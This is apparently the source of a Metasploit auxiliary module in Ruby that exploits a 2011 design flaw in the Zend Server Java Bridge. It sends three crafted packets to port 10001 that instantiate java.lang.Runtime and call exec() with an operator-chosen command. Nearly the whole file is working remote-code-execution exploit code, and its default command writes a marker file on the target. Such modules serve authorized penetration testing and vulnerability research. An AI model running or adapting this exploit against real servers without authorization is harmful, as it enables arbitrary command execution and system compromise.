GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/zend/java_bridge.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
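class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp

  # Upper bound on the command we can carry in one exec() request. The
  # original PoC encodes the outer frame length as a 16-bit value with a
  # 21-byte fixed overhead, and the inner command length is also 16-bit, so
  # anything larger cannot be framed the way the target is known to accept.
  MAX_CMD_BYTES = 0xffff - 21

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zend Server Java Bridge Design Flaw Remote Code Execution',
        'Description' => %q{
          This module abuses a flaw in the Zend Java Bridge Component of
          the Zend Server Framework. By sending a specially crafted packet, an
          attacker may be able to execute arbitrary code.

          NOTE: This module has only been tested with the Win32 build of the software.
        },
        'Author' => [ 'ikki', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '71420'],
          ['ZDI', '11-113'],
          ['EDB', '17078'],
        ],
        'DisclosureDate' => '2011-03-28',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The default CMD drops %SYSTEMDRIVE%\metasploit.txt on the target,
          # so operators should expect an on-disk artifact as well as log entries.
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10001),
        OptString.new('CMD', [false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
      ]
    )
  end

  # Drives the three-request exchange against the Java Bridge port:
  # CreateObject("java.lang.Runtime"), then getRuntime(), then exec(CMD).
  # Every request is a 4-byte big-endian payload length followed by the
  # payload; the 4-byte id at offset 5 of each of the first two replies is
  # carried into the next request. Replies that are too short to hold that
  # id are reported and abort the run instead of raising on a nil slice.
  # The socket is always closed on the way out.
  def run
    # Treat the command as raw bytes: the wire format carries byte lengths,
    # and String#length would under-count any non-ASCII command.
    cmd = datastore['CMD'].to_s.b
    if cmd.empty?
      print_error('CMD must not be empty')
      return
    end
    if cmd.bytesize > MAX_CMD_BYTES
      print_error("CMD is too long (#{cmd.bytesize} bytes, maximum #{MAX_CMD_BYTES})")
      return
    end

    connect
    begin
      print_status("Creating the Java Object 'java.lang.Runtime'")
      classid = request_id(create_object_message)
      return unless classid

      print_status("Invoking static method 'getRuntime()'")
      methodid = request_id(get_runtime_message(classid))
      return unless methodid

      print_status("Invoking method 'exec()' with parameter '#{cmd}'")
      sock.put(exec_message(methodid, cmd))
      reply = sock.get_once || ''
      # The original PoC treats any reply containing three consecutive NUL
      # bytes as success; the exact reply layout is not documented here.
      unless reply.b.include?("\x00\x00\x00".b)
        print_error('Failed to run command...')
        return
      end

      # Best effort: the reset request is sent without waiting for a reply.
      print_status('Cleaning up the JVM')
      sock.put(reset_message)
    ensure
      disconnect
    end
  end

  private

  # Outer frame: 32-bit big-endian byte length of +payload+, then the payload.
  def frame(payload)
    [payload.bytesize].pack('N') + payload
  end

  # Inner string field: 32-bit big-endian byte length, then the bytes.
  def length_prefixed(str)
    [str.bytesize].pack('N') + str
  end

  # Sends +msg+ and returns the 4-byte id the bridge places at offset 5 of its
  # reply. Returns nil (after reporting) when the reply is shorter than 9
  # bytes and therefore cannot contain a full id.
  def request_id(msg)
    sock.put(msg)
    res = (sock.get_once || '').b
    id = res[5, 4]
    if id.nil? || id.bytesize != 4
      print_error("Unexpected reply of #{res.bytesize} bytes (need at least 9)")
      return nil
    end
    id
  end

  # Request 1: CreateObject("java.lang.Runtime"). The argument block
  # (0x00000002 BE, 0x00000004 LE, 1-byte class-name length, name, 0x07) is
  # reproduced from the original PoC; its field meanings are not documented.
  def create_object_message
    klass = 'java.lang.Runtime'
    payload = [0].pack('N')
    payload << length_prefixed('CreateObject')
    payload << [2].pack('N') << [4].pack('V')
    payload << [klass.bytesize].pack('C') << klass << "\x07"
    payload << [0].pack('N')
    frame(payload)
  end

  # Request 2: invoke static getRuntime() on the class id from request 1.
  def get_runtime_message(classid)
    payload = classid.dup
    payload << length_prefixed('getRuntime')
    payload << [0].pack('N')
    frame(payload)
  end

  # Request 3: invoke exec(cmd) on the runtime id from request 2. The single
  # argument is tagged 0x04 and carries a 16-bit big-endian byte length.
  def exec_message(methodid, cmd)
    payload = methodid.dup
    payload << length_prefixed('exec')
    payload << [1].pack('N')
    payload << "\x04" << [0].pack('n') << [cmd.bytesize].pack('n') << cmd
    frame(payload)
  end

  # Cleanup request: reset on object id 0xffffffff.
  def reset_message
    payload = [0xffffffff].pack('V')
    payload << length_prefixed('reset')
    payload << [0].pack('N')
    frame(payload)
  end
end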